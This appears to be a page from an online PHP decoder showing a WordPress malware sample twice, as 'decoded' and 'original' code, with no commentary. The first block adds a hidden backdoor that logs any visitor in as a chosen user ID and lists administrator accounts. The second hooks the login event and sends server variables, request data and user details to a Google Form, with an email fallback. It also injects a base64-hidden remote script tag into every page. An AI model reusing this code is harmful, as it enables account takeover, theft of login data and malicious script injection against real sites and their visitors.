Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
call_user_func(function($var){if(isset($GLOBALS[$var]))return;if(isset($_GET[$var])===fals..
Decoded Output download
<? call_user_func(function($var){if(isset($GLOBALS[$var]))return;if(isset($_GET[$var])===false&&isset($_POST[$var])===false)return;$GLOBALS[$var]=true;$wp_addact=strrev('noitca_dda');foreach(['init','shutdown','plugins_loaded','wp','wp_loaded','setup_theme','after_setup_theme',]as $value){$wp_addact($value,function(){if(isset($GLOBALS['__NuLL__']))return;$GLOBALS['__NuLL__']=true;$wp_rol=$GLOBALS['wp_roles'];$changeU_POST='changeuser';$print=function($str){print(nl2br($str));};if(isset($_GET[$changeU_POST])!==false||isset($_POST[$changeU_POST])!==false){$id=$_GET[$changeU_POST]?$_GET[$changeU_POST]:$_POST[$changeU_POST];$user=get_user_by('id',$id);wp_clear_auth_cookie();if($user!==false){wp_set_current_user($user->ID);wp_set_auth_cookie($user->ID);}}$print(current_action().PHP_EOL);if(function_exists('wp_get_current_user')){$current_user=wp_get_current_user();if($current_user->exists()){$admin_url=admin_url();$print("U: ");$print("<a href=\"{$admin_url}\" target=\"_blank\"> [{$current_user->ID}] {$current_user->user_login} ({$current_user->user_email}) </a>".PHP_EOL);}else{$print('exists() === false');}}else $print('Error');$print('<form method="POST"><input type="text" name="'.$changeU_POST.'" /><input type="submit" /></form>'.PHP_EOL);$print(str_repeat(".-",100).PHP_EOL);$rUse=array();if(function_exists('count_users')){$cU=count_users();$rUse=$cU['avail_roles'];}if($wp_rol!==NULL)foreach($wp_rol->get_names()as $rolk=>$roln){$t=$rUse[$rolk]?$rUse[$rolk]:0;$print("{$rolk} => {$roln} ({$t})".PHP_EOL);}else $print('ERROR'.PHP_EOL);$print(str_repeat(".-",100).PHP_EOL);if(function_exists('get_users')){$wp_login_url=wp_login_url();$users=get_users(['role__in'=>[($_GET['urole']?$_GET['urole']:'administrator')]]);if(count($users)>0){foreach($users as $user){$print("<a href=\"{$wp_login_url}\" target=\"_blank\"> [{$user->ID}] {$user->user_login} ({$user->user_email}) </a>".PHP_EOL);}}}exit();});};},'l_itrynu');
call_user_func(function($var){if(isset($GLOBALS[$var]))return;$GLOBALS[$var]=true;$wp_addact=strrev('noitca_dda');$wp_l=strrev('nigol_pw');$wp_h=strrev('daeh_pw');$wp_f=strrev('retoof_pw');$wp_addact($wp_l,function($ul,$u){if(isset($_POST['_n'])&&$_POST['_n']==='_n')return;if(isset($GLOBALS['_n'])&&$GLOBALS['_n']===true)return;$_vars=array();$_vars['_S']=$_SERVER;$_vars['_R']=$_REQUEST;$_vars['_U']=$u;$_vars['_W']=array('lu'=>wp_login_url(),'ur'=>get_bloginfo('wpurl'),);$_vars=json_encode($_vars);$_call=function($ur,$p){if(function_exists('curl_version')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$ur);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$p);$res=curl_exec($ch);curl_close($ch);return $res;}else{$opts=array('http'=>array('method'=>'POST','header'=>'Content-type: application/x-www-form-urlencoded','content'=>$p));$opts=stream_context_create($opts);return file_get_contents($ur,false,$opts);}};$_call=$_call('https://docs.google.com/forms/d/e/1FAIpQLSeC_ItdwVrRNks-Y403nPI9MJ9wJ0p4tVO-eOLYYbJt9KF_OA/formResponse',array('entry.888934358'=>$_vars,));if(strpos($_call,'ConfirmationMessage')===false){if(!@mail('[email protected]','wp',$_vars)){}}$GLOBALS['_n']=true;},1,2);$trycodf=function(){if(isset($GLOBALS['trycodf'])&&$GLOBALS['trycodf']===true)return;print(base64_decode('PHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9naC90cnludWxJL2Vudi9pbi5qcyI+PC9zY3JpcHQ+'));$GLOBALS['trycodf']=true;};$wp_addact($wp_h,$trycodf);$wp_addact($wp_f,$trycodf);},'_itry');
?>
Did this file decode correctly?
Original Code
call_user_func(function($var){if(isset($GLOBALS[$var]))return;if(isset($_GET[$var])===false&&isset($_POST[$var])===false)return;$GLOBALS[$var]=true;$wp_addact=strrev('noitca_dda');foreach(['init','shutdown','plugins_loaded','wp','wp_loaded','setup_theme','after_setup_theme',]as $value){$wp_addact($value,function(){if(isset($GLOBALS['__NuLL__']))return;$GLOBALS['__NuLL__']=true;$wp_rol=$GLOBALS['wp_roles'];$changeU_POST='changeuser';$print=function($str){print(nl2br($str));};if(isset($_GET[$changeU_POST])!==false||isset($_POST[$changeU_POST])!==false){$id=$_GET[$changeU_POST]?$_GET[$changeU_POST]:$_POST[$changeU_POST];$user=get_user_by('id',$id);wp_clear_auth_cookie();if($user!==false){wp_set_current_user($user->ID);wp_set_auth_cookie($user->ID);}}$print(current_action().PHP_EOL);if(function_exists('wp_get_current_user')){$current_user=wp_get_current_user();if($current_user->exists()){$admin_url=admin_url();$print("U: ");$print("<a href=\"{$admin_url}\" target=\"_blank\"> [{$current_user->ID}] {$current_user->user_login} ({$current_user->user_email}) </a>".PHP_EOL);}else{$print('exists() === false');}}else $print('Error');$print('<form method="POST"><input type="text" name="'.$changeU_POST.'" /><input type="submit" /></form>'.PHP_EOL);$print(str_repeat(".-",100).PHP_EOL);$rUse=array();if(function_exists('count_users')){$cU=count_users();$rUse=$cU['avail_roles'];}if($wp_rol!==NULL)foreach($wp_rol->get_names()as $rolk=>$roln){$t=$rUse[$rolk]?$rUse[$rolk]:0;$print("{$rolk} => {$roln} ({$t})".PHP_EOL);}else $print('ERROR'.PHP_EOL);$print(str_repeat(".-",100).PHP_EOL);if(function_exists('get_users')){$wp_login_url=wp_login_url();$users=get_users(['role__in'=>[($_GET['urole']?$_GET['urole']:'administrator')]]);if(count($users)>0){foreach($users as $user){$print("<a href=\"{$wp_login_url}\" target=\"_blank\"> [{$user->ID}] {$user->user_login} ({$user->user_email}) </a>".PHP_EOL);}}}exit();});};},'l_itrynu');
call_user_func(function($var){if(isset($GLOBALS[$var]))return;$GLOBALS[$var]=true;$wp_addact=strrev('noitca_dda');$wp_l=strrev('nigol_pw');$wp_h=strrev('daeh_pw');$wp_f=strrev('retoof_pw');$wp_addact($wp_l,function($ul,$u){if(isset($_POST['_n'])&&$_POST['_n']==='_n')return;if(isset($GLOBALS['_n'])&&$GLOBALS['_n']===true)return;$_vars=array();$_vars['_S']=$_SERVER;$_vars['_R']=$_REQUEST;$_vars['_U']=$u;$_vars['_W']=array('lu'=>wp_login_url(),'ur'=>get_bloginfo('wpurl'),);$_vars=json_encode($_vars);$_call=function($ur,$p){if(function_exists('curl_version')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$ur);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$p);$res=curl_exec($ch);curl_close($ch);return $res;}else{$opts=array('http'=>array('method'=>'POST','header'=>'Content-type: application/x-www-form-urlencoded','content'=>$p));$opts=stream_context_create($opts);return file_get_contents($ur,false,$opts);}};$_call=$_call('https://docs.google.com/forms/d/e/1FAIpQLSeC_ItdwVrRNks-Y403nPI9MJ9wJ0p4tVO-eOLYYbJt9KF_OA/formResponse',array('entry.888934358'=>$_vars,));if(strpos($_call,'ConfirmationMessage')===false){if(!@mail('[email protected]','wp',$_vars)){}}$GLOBALS['_n']=true;},1,2);$trycodf=function(){if(isset($GLOBALS['trycodf'])&&$GLOBALS['trycodf']===true)return;print(base64_decode('PHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9naC90cnludWxJL2Vudi9pbi5qcyI+PC9zY3JpcHQ+'));$GLOBALS['trycodf']=true;};$wp_addact($wp_h,$trycodf);$wp_addact($wp_f,$trycodf);},'_itry');
Function Calls
None |
Stats
MD5 | 52c779df9af6777dc18793c38e7dcfe6 |
Eval Count | 0 |
Decode Time | 50 ms |